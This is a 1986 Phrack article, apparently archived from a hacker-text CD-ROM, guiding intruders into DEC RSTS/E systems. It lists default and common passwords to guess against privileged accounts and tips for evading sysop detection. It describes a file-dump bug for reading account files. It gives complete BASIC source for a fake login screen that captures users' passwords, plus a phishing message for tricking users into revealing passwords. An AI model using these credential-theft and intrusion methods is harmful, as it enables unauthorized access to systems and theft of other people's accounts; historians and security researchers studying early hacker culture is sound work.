home *** CD-ROM | disk | FTP | other *** search
/ The Hacker Chronicles - A…the Computer Underground / The Hacker Chronicles - A Tour of the Computer Underground (P-80 Systems).iso / phrk1 / ph075.txt < prev    next >
Text File  |  1992-09-26  |  12KB  |  274 lines

  1.                                ==Phrack Inc.==
  2.  
  3.                     Volume One, Issue 7, Phile #5 of 10
  4.  
  5.  
  6. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  7. $                                    $
  8. $         PROGRAMMING RSTS/E         $
  9. $          File1: Passwords          $
  10. $                                    $
  11. $           by:  The Seker           $
  12. $                  TOK!              $
  13. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  14. $     Written  (c)  May 22, 1986     $
  15. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  16.  
  17.                  A 'TRIBUNAL COMMUNICATIONS' Presentation
  18. -------------------------------------------------------------------------------
  19.  
  20. PREFACE:
  21. --------
  22.  
  23.      This document is first in a series of ongoing files about using the
  24. RSTS/E operating system.  All the files are based on version 8.0 as it is
  25. almost fully compatible with the previous releases.  If the need arises I have
  26. made sure to note differences between V8.x and V9.x.
  27.    Credit goes to High Evolutionary for urging me to write these files; to
  28. Night Stalker for sharing info; and to all other RSTS hackers that have
  29. contributed in some way or another.
  30.  
  31. HISTORY:
  32. --------
  33.      The RSTS/E (Resource System Time Sharing /Environment) operating system
  34. was developed for the PDP/11 series of minicomputers created by DEC. (Digital
  35. Equipment Corporation)  It was developed with ease of use for the user (and
  36. hacker) in mind.  Because of this, there have been a lot of overlooked errors
  37. leaving the system with quite weak security.  In later versions, especially
  38. the 9.x series password security has been greatly improved and is more secure,
  39. but still has plenty of bugs for us to breach.
  40.  
  41. LOGGING ON:
  42. -----------
  43.      Briefly.. locate a valid number and connect.  Hit c/r (carriage return) a
  44. few times or type:
  45.  HELLO
  46. The system should identify itself displaying to you who owns it, what version
  47. they're running under, the date, and the time.  Then it will prompt for an
  48. account number and a password.
  49.      Accounts are in a PPN (Project Program Number) format.  This is actually
  50. two numbers each between 0 and 254 separated by a comma or a slash.  (eg. 3,45
  51. or 27/248)  Privileged accounts which you should hopefully be striving for all
  52. start with a 1.  So start hacking 1,x accounts.
  53.      Passwords are 1-6 characters long.  They are only alphanumeric so you
  54. don't have to worry about all that other shit being included.  On V9.x systems
  55. passwords may be up to 8 characters if the operator has changed the default
  56. length.  But this rarely ever happens as most ops are too lazy.
  57.      Common passwords are:
  58.  SYSLIB
  59.  SYSGEN
  60.  SYSCON
  61.  SYSMGR
  62.  SYSOPR
  63.  SYSTEM
  64.  OPRATR
  65.  RSTS
  66.  DECNET
  67.  GAMES
  68.  YYYYYY
  69.  XXXXXX
  70.  XYXYXY
  71.  DATA
  72.  RICH
  73.  XXX
  74.  AAA
  75.      Many of those have been rumored to be defaults.  But actually I think the
  76. true default (if there is one!) password is:
  77.  RSTSE
  78.      Also, accounts that have a password of:
  79.  ??????
  80. are only accessible by operators.
  81.      Remember to try names, cars, objects, the name of the company (in
  82. different variations), etc.  Cause most people generally pick passwords that
  83. have some relation to their private life.. Take a little time and guess...
  84.  
  85. YOUR IN!
  86. --------
  87.      Once you have succeeded in hacking out a valid password, whether it be
  88. privileged or not, I suggest you find out who is logged onto the system.  You
  89. can do this simply by typing:
  90.  SY
  91.      This will tell you everyone logged on, what they are doing at the moment,
  92. their job number, whether they are attached or detached, and a hell of a lot of
  93. other crap.  What you are looking for is someone else logged in under the same
  94. account you are.  If you find another user in the same account you hacked, log
  95. off and call back later.  This will prolong the life of your account and
  96. prevent a rise in suspicion by the sysops.  Remember, every system keeps a log
  97. of what you do, and if two people are logged in under the same account many
  98. times the sysops will delete or change the password to that account.
  99.      If everything checks out okay, you're free to do as you please.  To list
  100. the files in your allotted space type:
  101.  DIR
  102. or to see all the files on the system type:
  103.  DIR (*,*)
  104.     NOTE: [ ] may be used in place of ( ) when dealing with files.
  105.      * acts as a wildcard on the RSTS system and can be used in place of
  106. account numbers when searching for specific files.  Speaking of searching for
  107. files; to run a file type:
  108.  RUN filename.filetype
  109. where filename = the file you wish to run, and filetype = the extension.
  110.      Experiment!  Try what you will.  If you ever need help just type:
  111.  HELP
  112.      Read the files contained within help.  They are very detailed and I
  113. guarantee can help you with what ever it is you need done.
  114.      One other thing, a few useful control characters are:
  115.  ^C   Breaks out of whatever your doing
  116.  ^R   Repeats last line typed
  117.  ^X   If ^C doesn't work, this may
  118.  ^O   Use to stop the flow of text without aborting the function in process
  119.  ^T   Tells status and runtime of terminal
  120.  ^U   Deletes line presently being typed in
  121.  ^H   Deletes characters
  122.  ^S   Transmission off
  123.  ^Q   Transmission on
  124.  
  125. GAINING PRIVILEGES:
  126. -------------------
  127.      If you weren't able to hack out a privileged account don't panic.  There
  128. are still a few other ways for you to attain sysop status.  These methods may
  129. not always work, but they are worth a try.
  130.    ]SYSTEM LOG[
  131.      On many RSTS/E systems before V9.0 there is one account dedicated to
  132. keeping the system log; everything you and everyone else does.  I have found
  133. this account many times to be 1,101, 1,2, or 0,1 but you may want to do a
  134. directory find to make sure.  Type:
  135.  DIR (*,*)OPSER.LOG
  136. or if nothing appears from that type:
  137.  DIR (*,*)SYSLOG.*
  138. or
  139.  DIR (*,*)
  140.      Look for a file similar in name to that and mark down the account it
  141. appears in.  Now that you know which account the system log resides in logoff.
  142.  BYE
  143.      Then sign back on using the account in which the file was in.  For
  144. password try one of the following:
  145.  OPSER
  146.  OPSLOG
  147.  LOG
  148.  OPS
  149.  OOPS
  150.  OPRATR
  151.  SYSLOG
  152.  SYSTEM
  153.      These are common passwords to that account.  If none of these work your
  154. out of luck unless you can think of some other password that may be valid.
  155.    ]SYSTEM BUGS[
  156.      When operating systems as complex as RSTS/E are created there will
  157. undoubtedly be a few bugs in the operation or security.  (Sometimes I am not
  158. sure if these are intentional or not.)  These can often be taken advantage of.
  159. One that I know of is RPGDMP.TSK.  To use this type:
  160.  RUN (1,2)RPGDMP
  161.      It will ask for a filename, and an output device.  Give it any filename on
  162. the system (I suggest $MONEY, $REACT, or $ACCT.SYS) and it will be dumped to
  163. the specified device. (db1:, screen, etc).
  164.      Credit for this goes to The Marauder of LOD for finding, exposing and
  165. sharing this bug with all.
  166.      If you find any other bugs similar to this, I would appreciate your
  167. getting in touch with and letting me know.
  168.  
  169. GETTING PASSWORDS:
  170. ------------------
  171.      Now that you've hopefully gotten yourself priv's we can get on with these
  172. files.  Getting many passwords is a safety procedure, kind of like making a
  173. backup copy of a program.  There are a number of ways to get yourself
  174. passwords, the easiest is by using privileges, but we will discuss that in a
  175. later file.  The methods I am going to explain are the decoy and a trick I like
  176. to use, which I call the mail method.
  177.    ]DECOY[
  178.      The decoy, commonly called a Trojan Horse, (which is something completely
  179. different) is a program which emulates login.bac.  When the unsuspecting user
  180. enters his account and password you have your program store it into a file that
  181. you can retrieve later.  Here is a short program I've written that will preform
  182. this task:
  183.  
  184. type NEW and it will prompt for a filename.  Enter something not to obvious.
  185.  
  186.    1 ! RSTSE Decoy
  187.    2 ! Written by The Seker (c) 1986 TOK!
  188.    5 extend
  189.   10 print:print
  190.   20 &"RSTS V8.0-07 TOK Communications Ltd.  Job 7  <Dial-up> KB41
  191.  ";date$(0);"  ";time$(0)
  192.   30 print
  193.   40 &"User: ";
  194.   50 open "KB:" for input as file #1
  195.   60 on error goto 300
  196.   70 input #1,proj%,prog%
  197.   80 z$=sys(chr$(3%))
  198.   90 &"Password: ";
  199.  100 on error goto 300
  200.  110 input #1,pass$
  201.  120 print:z$=sys(chr$(2%))
  202.  130 close #1
  203.  140 open "SYSLIB.BAC" for output as file #2
  204.  150 print #2,proj%
  205.  160 print #2,prog%
  206.  170 print #2,pass$
  207.  180 close #2
  208.  200 print:print
  209.  210 off$=sys(chr$(14%)+"bye/f"+chr$(13))
  210.  300 if erl=70 then goto 350
  211.  310 if erl=110 then goto 360
  212.  350 &"Invalid entry - try again":z$=sys(chr$(2%)):try=try+1:if try=5 then goto
  213. 200 else resume 30
  214.  360 &"Invalid entry - try again":try=try+1:if try=5 then goto 200 else resume
  215. 90
  216.  999 end
  217.  
  218.      The program as I said emulates login.bac, then logs the person off after a
  219. few tries.  Save this program.  Then run it.  When it starts, just drop the
  220. carrier.  The next person to call within 15 minutes will get your imitation
  221. login.
  222.      If you are working on an older system like V7.0 change line 40 to read:
  223.  40 &"# ";
  224.    NOTE: This will not work without modifications on releases after V8.7.  An
  225. improved and updated version of this program will be released as a small file
  226. at a later date.
  227.      Next time you login and you want to recover the file type:
  228.  TYPE SYSLIB.BAC
  229.      It should print out the account and password.  If you set this running
  230. each time you plan on hanging up within a few days you'll have yourself a
  231. handful of valid accounts.
  232.    ]MAIL[
  233.      To run mail type:
  234.  RUN $MAIL
  235.      The mail method is probably used by many hackers and since I like to use
  236. it, I thought I'd tell you what it was.
  237.      When you run the program the utility will tell you exactly how to use
  238. itself.  Assuming you know a little about it anyway we will get on with the
  239. file.  The object is to send mail to another user and try and convince him/her
  240. you are the sysop and are writing him/her to validate their password.  Don't
  241. try this with a priv'd user!  It would result in instant deletion.
  242.      Here's basically what you'd type:
  243.  
  244.    Hello.  We are contacting each of the users and validating their records to
  245. keep our files up to date. If you would cooperate and leave me a response which
  246. includes your full name, account number, and password we would appreciate your
  247. help.
  248.  
  249.                                            John Doe
  250.                                        System's Operator
  251.                                              4,11
  252.  
  253.      As you can see the idea is to con a user into believing you are one of the
  254. system ops.  I would say this method works approximately 70% of the time on
  255. most systems since users often times don't associate with sysops.  Use a
  256. different name if you try this though, as John Doe wouldn't fool anyone.  (Be
  257. creative)  Also the 4,11 is the account you'd like them to leave the response
  258. too.
  259.      You can try a few variations of this if you like.  For example, if the
  260. system you're hacking has a chat program:
  261.  RUN $TALK
  262. you can just talk live time to them.  Or if you somehow (like trashing) manage
  263. to get a list of all the users and their phone numbers, you can call them up
  264. and bullshit them.
  265.  
  266.    NOTE: This document is intended for informational purposes only.  The author
  267. is in no way responsible for how it is used.  Sysops are free to display this
  268. at their will as long as no information within is altered and all
  269. acknowledgements go to The Seker and members of The Tribunal of Knowledge.
  270.  
  271. -------------------->   (c) 1986 TRIBUNAL OF KNOWLEDGE!  <--------------------
  272. 
  273. Downloaded From P-80 International Information Systems 304-744-2253 12yrs+
  274.